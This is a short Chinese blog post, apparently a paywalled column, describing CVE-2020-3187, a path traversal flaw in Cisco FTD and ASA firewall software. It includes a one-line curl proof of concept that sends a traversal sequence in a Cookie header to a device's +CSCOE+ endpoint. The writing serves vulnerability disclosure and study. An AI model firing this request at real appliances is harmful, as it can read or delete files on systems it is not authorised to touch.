超级会员免费看
本文详细介绍了CVE-2020-3187漏洞,涉及Cisco Firepower Threat Defense和Adaptive Security Appliances Software。该漏洞允许攻击者通过发送特制HTTP请求进行路径遍历,从而读取或删除系统敏感信息。文章包括漏洞简介、漏洞利用方法的POC演示以及厂商提供的修复措施。
CVE-2020-3187
漏洞简介
Cisco Firepower Threat Defense(FTD)和Cisco Adaptive Security Appliances Software(ASA Software)都是美国思科(Cisco)公司的产品。Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。 Cisco Firepower Threat Defense和Adaptive Security Appliances Software存在路径遍历漏洞,该漏洞源于程序未对HTTP URL进行正确的输入验证。攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。
漏洞利用
POC
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
